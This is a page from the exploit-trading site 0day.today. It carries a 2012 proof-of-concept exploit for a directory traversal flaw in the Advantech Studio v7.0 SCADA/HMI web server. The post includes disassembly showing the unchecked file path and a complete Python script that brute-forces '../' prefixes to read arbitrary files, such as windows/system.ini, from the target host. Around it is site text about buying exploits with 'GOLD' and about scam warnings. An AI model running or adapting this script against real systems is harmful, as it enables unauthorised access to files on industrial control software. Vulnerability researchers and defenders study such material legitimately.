0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day # Google Dork: N/A # Date: 2012-12-03 # Exploit Author: Nin3 # Vendor Homepage: http://advantech.com.tw # Version: 7.0 Build Number 0501.1111.0402.0000 # Tested on: Windows # CVE : N/A ''' Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe, the web server is a standalone executable that is used along side every project' to serve as a web based management system with the help of an activex. The flaw occurs because of a lack of any check on the path of the file requested. in function sub_401A90: .text:00402A4A push 0 ; dwFlagsAndAttributes .text:00402A4C push 3 ; dwCreationDisposition .text:00402A4E push 3 ; dwShareMode .text:00402A50 push 80000000h ; dwDesiredAccess .text:00402A55 mov edx, [ebp+lpFileName] .text:00402A58 push edx ; lpFileName .text:00402A59 lea ecx, [ebp+var_1C] .text:00402A5C call sub_401A90 sub_401A90 use CreateFileW function directly. .text:00401A97 push 0 ; hTemplateFile .text:00401A99 mov eax, [ebp+dwFlagsAndAttributes] .text:00401A9C push eax ; dwFlagsAndAttributes .text:00401A9D mov ecx, [ebp+dwCreationDisposition] .text:00401AA0 push ecx ; dwCreationDisposition .text:00401AA1 push 0 ; lpSecurityAttributes .text:00401AA3 mov edx, [ebp+dwShareMode] .text:00401AA6 push edx ; dwShareMode .text:00401AA7 mov eax, [ebp+dwDesiredAccess] .text:00401AAA push eax ; dwDesiredAccess .text:00401AAB mov ecx, [ebp+lpFileName] .text:00401AAE push ecx ; lpFileName .text:00401AAF call ds:CreateFileW ''' import argparse import httplib MAX_NESTED_DIRECTORY = 32 def main(): parser = argparse.ArgumentParser() parser.add_argument('-d') parser.add_argument('-p') parser.add_argument('-f') args = parser.parse_args() if args.d == None or args.p == None or args.f == None: print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini" return httpConn = httplib.HTTPConnection(args.d, int(args.p)) for i in xrange(0, MAX_NESTED_DIRECTORY): temp = MakePath(args.f, i) httpConn.request('GET', temp) resp = httpConn.getresponse() content = resp.read() if resp.status == 404: print 'Not found ' + temp else: print 'Found ' + temp print'------------------------------------------' print content print'---------------------------------------EOF' break def MakePath(f, count): a = "" for i in xrange(0, count): a = a + "../" return a + f if __name__ == "__main__": main() # 0day.today [2024-09-28] #